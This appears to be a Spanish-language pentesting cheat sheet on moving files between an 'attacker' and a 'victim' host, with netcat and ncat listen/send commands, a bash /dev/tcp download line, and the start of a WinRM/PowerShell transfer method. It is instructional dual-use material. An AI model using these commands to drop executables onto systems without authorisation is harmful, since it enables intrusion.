1. Transferencia con Netcat (nc/ncat)

Víctima en Escucha:

nc -l -p 8000 --recv-only > archivo.exe

• -recv-only: Cierra la conexión una vez finalizada la transferencia de archivos.

Envío con Netcat:

{nc|ncat} {opciones} {ip_atacante} 8000 < archivo.exe

• Opciones:
  • nc -q 0: Cierra la conexión una vez que termine la transferencia.
  • ncat --send-only: Termina la conexión cuando se agote la entrada.

Host Atacante (Archivo como Entrada a Netcat):

sudo nc -l -p 443 -q 0 < archivo.exe
sudo ncat -l -p 443 --send-only < archivo.exe

Host Víctima (Conectarse para Recibir):

nc {ip} 443 > archivo.exe
ncat {ip} 443 --recv-only > archivo.exe

Transferencia sin Netcat (Usando /dev/tcp en Bash):

cat < /dev/tcp/{ip}/{puerto} > archivo.exe

2. Transferencia con PowerShell (WinRM)

En caso de que no existan servicios como HTTP, HTTPS o SMB, podemos usar WinRM para realizar operaciones de transferencia de archivos.

• WinRM permite ejecutar scripts o comandos en una computadora remota usando sesiones de PowerShell.
• Por defecto, WinRM escucha en los puertos:
  • HTTP: 5985
  • HTTPS: 5986

Paso 1: Confirmar que WinRM (5985) está abierto en la máquina víctima:

Test-NetConnection -ComputerName {nombre_maquina_victima} -Port 5985